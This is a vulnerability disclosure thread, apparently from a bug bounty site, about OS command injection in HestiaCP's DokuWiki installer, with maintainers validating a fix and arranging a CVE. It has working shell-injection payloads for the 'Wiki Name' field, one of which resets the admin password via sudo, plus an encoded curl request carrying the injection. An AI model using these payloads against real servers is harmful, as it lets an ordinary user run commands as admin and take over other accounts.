OS Command Injection user to admin in hestiacp/hestiacp


Reported on

Jul 22nd 2022


Arbitrary commands can be injected when installing DokuWiki.


Authenticated as "User" role users can inject commands. Injected commands are running as "admin" user.


  1. Any user access
  2. php 7.4 must be installed in order to install dokuwiki (only admin can install php7.4)

Vulnerable Parts;


Attackers can inject commands with $options['wiki_name'] and other $options['XXX'] variables.

Proof of Concept

[1] login to panel with user account.

[2] Open WEB tab. https://XX.XX.XX.XX:8083/list/web/

[3] Click "Add Web Domain"

[4] Enter random domain to domain field and save.

[5] In the "Edit Web Domain" page click "Quick Install App"

[6] Click "Setup" button in DokuWiki

[7] All fields are vulnerable, enter payload to "Wiki Name" field and fill other fields then click install button.

// payload

aa';  echo "injected" > /tmp/test; id >> /tmp/test ; echo '1

[9] Wait 10 sec


uid=1001(admin) gid=1001(admin) groups=1001(admin)

PoC Video



Attackers can runs commands as admin user. Attackers can access all users account.

Exmaple Payload;

Reset "admin" password to "XXX.xxx1234"

aa'; sudo /usr/local/hestia/bin/v-change-user-password  admin XXX.xxx1234; echo '1
We are processing your report and will contact the hestiacp team within 24 hours. a year ago
imp modified the report
a year ago
imp modified the report
a year ago
imp modified the report
a year ago
We have contacted a member of the hestiacp team and are waiting to hear back a year ago
hestiacp/hestiacp maintainer
a year ago


My github name is divinity76 , I am not (currently?) a member of HestiaCP and I do not speak for them, but I am a contributor and I am on the "security advisors" list on Discord, anyway i think this would fix it?

$cmd = implode(" ", array(
    "--request POST",
    ($sslEnabled ? "" : "--insecure "),
    "--url " . escapeshellarg($installUrl),
    "--header 'Content-Type: application/x-www-form-urlencoded'",
    '--data-binary ' . escapeshellarg(http_build_query(array(
        "l" => "en",
        "d" => array(
            "title" => $options['wiki_name'],
            'acl' => 'on',
            'superuser' => $options['superuser'],
            'fullname' => $options['real_name'],
            'email' => $options['email'],
            'password' => $options['password'],
            'confirm' => $options['password'],
            'policy' => substr($options['initial_ACL_policy'], 0, 1),
            'license' => explode(":", $options['content_license'])[0]
        'submit' => ''
a year ago


Hi, I tried your patch and vulnerability seems fixed. Can you request for CVE

Request looks like below

curl --request POST --insecure --url http://z.com/install.php --header Content-Type: application/x-www-form-urlencoded --data-binary l=en&d%5Btitle%5D=aa%27%3B+echo+%22injected%22+%3E+%2Ftmp%2Fpoc%3B+id+%3E%3E+%2Ftmp%2Fpoc+%3B+echo+%271&d%5Bacl%5D=on&d%5Bsuperuser%5D=asd&d%5Bfullname%5D=asd&d%5Bemail%5D=asd%40asd.asd&d%5Bpassword%5D=asd&d%5Bconfirm%5D=asd&d%5Bpolicy%5D=0&d%5Blicense%5D=cc-zero&submit=
Jaap Marcus validated this vulnerability a year ago
imp has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
Jaap Marcus marked this as fixed in 1.6.5 with commit 3d4c30 a year ago
The fix bounty has been dropped
This vulnerability will not receive a CVE
DokuWikiSetup.php#L88 has been validated
Jaap Marcus
a year ago


@admin I am sure I "Set CVE" to "Yes" how ever none has been issued

Please issue an CVE for this one

Jamie Slome
a year ago


Hmm, did you select save on the Yes option? Apologies for the confusion - it sounds like a bug.

I will assign a CVE here 👍

to join this conversation